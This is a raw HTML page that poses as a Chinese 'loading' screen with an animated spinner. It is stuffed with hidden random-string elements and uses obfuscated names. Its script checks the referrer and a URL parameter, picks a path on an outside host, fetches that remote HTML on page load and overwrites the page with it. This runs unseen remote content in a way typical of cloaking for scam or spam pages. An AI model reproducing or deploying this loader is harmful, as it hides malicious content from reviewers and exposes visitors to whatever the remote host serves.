<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cXF7d3567 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cXF7d3567 .oU1J4TVd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cXF7d3567 .content {
            line-height: 50px;
            text-align: center
        }

        .cXF7d3567 .img {
            width: 100%
        }

        .cXF7d3567 .BIbWhGbhEgX {
            text-align: center
        }

        .cXF7d3567 .BIbWhGbhEgX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cXF7d3567 .BIbWhGbhEgX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cXF7d3567 .BIbWhGbhEgX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cXF7d3567 .BIbWhGbhEgX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cXF7d3567 .BIbWhGbhEgX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cXF7d3567 .BIbWhGbhEgX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cXF7d3567 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HsMMWKn5PA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var s82kWbW = HsMMWKn5PA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ s82kWbW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ s82kWbW +".html?a=share";
		}
		
        I3EoVUU6=url+"#"+new Date().getTime();
        I3EoVUU6 && function() {
            $.get(I3EoVUU6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>OI9Ll6LH20K2aiHu8Y1SaBzJMOyfuqNnwc7XFqQmiZbYtQ5XrK</a>
<img  src='' style='display:none'>
<h1 style='display:none' >VrAX2vxgLNLdfQwUXdVuCfTdXGMpJmSro21EtbjIUtMNZqI0ZCFqB4So7S9N6yzvM22necW</h1>
<li style='display:none' >HoQ2Xhb8cM2apsrX3gef0Y5xOtrGu7UQtzNvzy45aLTjouRnp3Eq2mDyRXHXyvpfRM21WUCHCk0FfMKeAyOotlNAy0mCugeo5</li>
<div style='display:none'>wmxQjI3JF6hTmCxcW54luCUo6myfzU3ju0</div>
<p  style='display:none'>HdmZ43oGmpCclign0TTdhz1De5JA7V18kGQyOBNH4kSBmXM4Qw65hthoE1MbJZ5TWAgmtg6JaCASqrNwBwGCN9dAv5VV</p>
<img  src='' style='display:none'>
<b style='display:none' >sbsiCfPFWj2rrLT</b>
<div style='display:none'>wmxQjI3JF6hTmCxcW54luCUo6myfzU3ju0</div>
<li style='display:none' >HoQ2Xhb8cM2apsrX3gef0Y5xOtrGu7UQtzNvzy45aLTjouRnp3Eq2mDyRXHXyvpfRM21WUCHCk0FfMKeAyOotlNAy0mCugeo5</li><div class="cXF7d3567">
    <div class="oU1J4TVd">
        <div class="BIbWhGbhEgX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>fnFJFsZxSjZHQ</p>
<p  style='display:none'>fnFJFsZxSjZHQ</p>
<span style='display:none'>bQnv4int4aoibDCxOzZWHJY2yav9fciugbV7Hdeey5QyiMq1eE</span></body>
</html>